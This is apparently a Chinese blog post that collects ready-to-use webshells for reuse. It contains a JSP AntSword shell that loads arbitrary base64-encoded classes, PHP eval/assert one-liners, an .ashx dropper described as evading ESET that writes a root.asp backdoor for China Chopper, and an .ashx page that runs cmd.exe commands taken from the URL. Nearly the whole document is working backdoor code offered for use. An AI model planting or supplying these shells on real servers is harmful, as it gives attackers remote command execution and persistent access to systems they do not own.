常用webshell

一些常用的webshell,记录避免有时候找不着。

JSP

jsp一句话打印输出验证

1
<%out.println("i am sircong");%>

<%out.println(“i am sircong”);%>

<%out.println("i am sircong");%>

jsp蚁剑马,密码:passwd

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
$<%!
  class U extends ClassLoader {
    U(ClassLoader c) {
      super(c);
    }
    public Class g(byte[] b) {
      return super.defineClass(b, 0, b.length);
    }
  }

  public byte[] base64Decode(String str) throws Exception {
    try {
      Class clazz = Class.forName("sun.misc.BASE64Decoder");
      return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
    } catch (Exception e) {
      Class clazz = Class.forName("java.util.Base64");
      Object decoder = clazz.getMethod("getDecoder").invoke(null);
      return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
    }
  }
%>
<%
  String cls = request.getParameter("passwd");
  if (cls != null) {
    new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
  }
%>

PHP

基础一句话

1
<?php eval(@$_POST['ST']);?>

`` code

1
2
`` code
<?php @assert($_POST['pass']);?>

ASP

ashx文件后缀,免杀eset,上传ashx马后,访问ashx马,会在webshell当前目录生成一个root.asp文件,使用菜刀连接root.asp,密码:root

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<%@ WebHandler Language="C#" class="Handler" %>

using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {

public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";

StreamWriter file1= File.CreateText(context.Server.MapPath("root.asp"));
file1.Write("<%response.clear:execute request(\"root\"):response.End%>");
file1.Flush();
file1.Close();

}

public bool IsReusable {
get {
return false;
}
}

}

ashx文件后缀,浏览器访问上传地址执行cmd命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
using System.Diagnostics;
using System.IO;

public class AverageHandler : IHttpHandler
{
  /* .Net requires this to be implemented */
  public bool IsReusable
  {
   get { return true; }
  }

  /* main executing code */
  public void ProcessRequest(HttpContext ctx)
  {
   Uri url = new Uri(HttpContext.Current.Request.Url.Scheme + "://" + HttpContext.Current.Request.Url.Authority + HttpContext.Current.Request.RawUrl);
   string command = HttpUtility.ParseQueryString(url.Query).Get("cmd");

   ctx.Response.Write("<form method='GET'>Command: <input name='cmd' value='"+command+"'><input type='submit' value='Run'>");
   ctx.Response.Write("<hr>");
   ctx.Response.Write("<pre>");

   /* command execution and output retrieval */
   ProcessStartInfo psi = new ProcessStartInfo();
   psi.FileName = "cmd.exe";
   psi.Arguments = "/c "+command;
   psi.RedirectStandardOutput = true;
   psi.UseShellExecute = false;
   Process p = Process.Start(psi);
   StreamReader stmrdr = p.StandardOutput;
   string s = stmrdr.ReadToEnd();
   stmrdr.Close();

   ctx.Response.Write(System.Web.HttpUtility.HtmlEncode(s));
   ctx.Response.Write("</pre>");
   ctx.Response.Write("<hr>");
   ctx.Response.Write("By < a href=' '>@Hypn, for educational purposes only.");
  }
}